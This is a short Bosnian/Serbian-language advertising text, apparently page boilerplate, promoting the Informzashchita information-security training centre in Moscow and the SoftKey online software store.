  • Centar za obuku "Informzashchita" http://www.itsecurity.ru - vodeći specijalizovani centar u oblasti obuke sigurnost informacija(Licenca Moskovskog komiteta za obrazovanje br. 015470, državna akreditacija br. 004251). Jedini ovlašteni centar za obuku za Internet Security Systems i Clearswift u Rusiji i zemljama ZND. Ovlašćeni Microsoft centar za obuku (Sigurnosna specijalizacija). Programi obuke su koordinirani sa Državnom tehničkom komisijom Rusije, FSB (FAPSI). Potvrde o obuci i državna dokumenta o usavršavanju.

    SoftKey je jedinstvena usluga za kupce, programere, dilere i pridružene partnere. Osim toga, ovo je jedna od najboljih online prodavnica softvera u Rusiji, Ukrajini, Kazahstanu, koja kupcima nudi širok spektar proizvoda, mnogo načina plaćanja, brzu (često trenutnu) obradu narudžbi, praćenje procesa narudžbi u ličnom dijelu, razne popusti od trgovine i proizvođača BY.